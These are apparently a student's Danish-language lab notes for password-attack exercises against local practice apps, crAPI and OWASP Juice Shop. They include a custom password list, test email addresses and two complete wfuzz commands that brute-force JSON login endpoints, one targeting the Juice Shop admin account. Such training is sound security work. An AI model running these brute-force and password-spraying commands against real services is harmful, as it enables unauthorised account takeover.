## Instruktioner

- Udfør øvelsen Dictionary attack with burp suite

- Udfør øvelsen Dictionary attack with WFuzz

- Udfør øvelsen Exhaustive brute force attack with Burpsuite

- Udfør øvelsen Password spraying

- Udfør øvelsen Brute forcing Juice shop


        Passwordlist
        f1@rjBPLOUh2Pp#A
        R4M@Kl%Lqjdlad*5
        pO!l87GF6ey4Q&xX
        *7T$Ru5vVXMWbNDq
        oWp*rL9rJ5c9Gr@F
        FQvp!9DLUX3ymCOd
        #Dt45t5nLQi8ZuUb
        I&Tau6Ra4Lk2o5Px
        xTiFey1ech8%!QIA
        P&sx9S5@N6euFj6B
        P&sx9S5@ch8%!QIA
        5nLQi8ZuUb*rL9rJ
        6ey4Q&xXf1@rjBPL
        xTiFey1ech89Gr@F
        #Dt45t5nI&Tau6Ro
        ch8%!QIA5nLQiwel
        M@Kl%Lqjdladqwpo
        l87GF6M@Kl%L5nI&
        weoj*rL9rJ5c9Gro


![Alt text](../Billeder/SettingsAfSniperAttack.png)

![Alt text](../Billeder/SniperAttack.png)

![Alt text](../Billeder/crapiCredentials.png)

http://localhost:8888/identity/api/auth/login

wfuzz -f /outfile,json -w rockyou.txt -H "Content-Type: application/json" -d '{"email":"zaq@zaq.zaq","password":"FUZZ"}' --sc 200 http://localhost:8888/identity/api/auth/login
![Alt text](<../Billeder/wfuzzCommando.png>)

![Alt text](../Billeder/IkkeVirkendewfuzz.png)


{
    "name":"ord",
    "email":"zaq@zaaq.zaq",
    "number":"755421",
    "password":"passwd"
}


![Alt text](../Billeder/BruteForceAngreb.png)


    passwd
    password
    kodeord
    hejmeddig
    hejhejhej!1
    ting
    tingtingting


    jhon@example.com
    james@example.com
    ting@ting.ting
    hej@hej.hej
    test@test.test
    mkn@eoz.dk
    robot001@example.com
    zaq@zaaq.zaq

![Alt text](../Billeder/PasswordSprayAngreb.png)


wfuzz -w /usr/share/seclists/Passwords/Common-Credentials/best1050.txt -H "Content-Type: application/json" -d '{"email":"admin@juice-sh.op","password":"FUZZ"}' --hc 401 http://localhost:3000/rest/user/login

![Alt text](../Billeder/juiceshopWordListAngreb.png)